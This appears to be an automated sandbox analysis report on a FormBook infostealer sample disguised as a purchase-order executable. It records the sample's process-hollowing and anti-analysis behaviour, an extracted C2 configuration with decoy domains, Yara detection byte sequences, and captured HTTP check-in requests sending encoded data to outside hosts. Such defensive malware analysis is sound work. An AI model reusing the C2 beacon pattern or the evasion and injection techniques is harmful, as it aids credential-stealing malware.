Play interactive tour

Edit tour

Analysis Report PO 367628usa.exe

Overview

General Information

Sample Name:	PO 367628usa.exe
Analysis ID:	412247
MD5:	42cf4c3943d5a839412a16a4d8b8d65d
SHA1:	f26230352a412de0ca8b1ffc6fc07838b878a68a
SHA256:	1ceec55d4acbb8db907798df6b1be5832f32d2d4e459c5bd08d0252a0763b30c
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

PO 367628usa.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\PO 367628usa.exe' MD5: 42CF4C3943D5A839412A16A4D8B8D65D)

PO 367628usa.exe (PID: 6692 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)

PO 367628usa.exe (PID: 6700 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)

PO 367628usa.exe (PID: 6716 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)

PO 367628usa.exe (PID: 6724 cmdline: C:\Users\user\Desktop\PO 367628usa.exe MD5: 42CF4C3943D5A839412A16A4D8B8D65D)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

raserver.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)

cmd.exe (PID: 5544 cmdline: /c del 'C:\Users\user\Desktop\PO 367628usa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjusering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xf8d98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf9132:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1201b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x120552:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x104e45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12c265:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x104931:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12bd51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x104f47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12c367:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1050bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12c4df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf9b4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x120f6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x103bac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x12afcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfa8c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x121ce2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x109f37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x131357:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10afda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x106e69:$sqlite3step: 68 34 1C 7B E1 0x106f7c:$sqlite3step: 68 34 1C 7B E1 0x12e289:$sqlite3step: 68 34 1C 7B E1 0x12e39c:$sqlite3step: 68 34 1C 7B E1 0x106e98:$sqlite3text: 68 38 2A 90 C5 0x106fbd:$sqlite3text: 68 38 2A 90 C5 0x12e2b8:$sqlite3text: 68 38 2A 90 C5 0x12e3dd:$sqlite3text: 68 38 2A 90 C5 0x106eab:$sqlite3blob: 68 53 D8 7F 8C 0x106fd3:$sqlite3blob: 68 53 D8 7F 8C 0x12e2cb:$sqlite3blob: 68 53 D8 7F 8C 0x12e3f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: PO 367628usa.exe PID: 6596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.PO 367628usa.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.PO 367628usa.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.PO 367628usa.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
5.2.PO 367628usa.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.PO 367628usa.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.PO 367628usa.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjusering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PO 367628usa.exe

Virustotal: Detection: 35%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: PO 367628usa.exe

Joe Sandbox ML: detected

Source: 5.2.PO 367628usa.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: PO 367628usa.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: PO 367628usa.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO 367628usa.exe, 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO 367628usa.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_00DD16E8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_00DD1658
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4x nop then pop esi	5_2_00415838
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop esi	9_2_00925838

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 209.182.202.96:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.uuoouu-90.store/meub/

Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.servantsheartvalet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.m-kenterprises.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.bridgestreetresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 66.235.200.147 66.235.200.147

Source: Joe Sandbox View	ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View	ASN Name: IMH-WESTUS IMH-WESTUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.servantsheartvalet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.m-kenterprises.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.bridgestreetresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.servantsheartvalet.com

Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/1
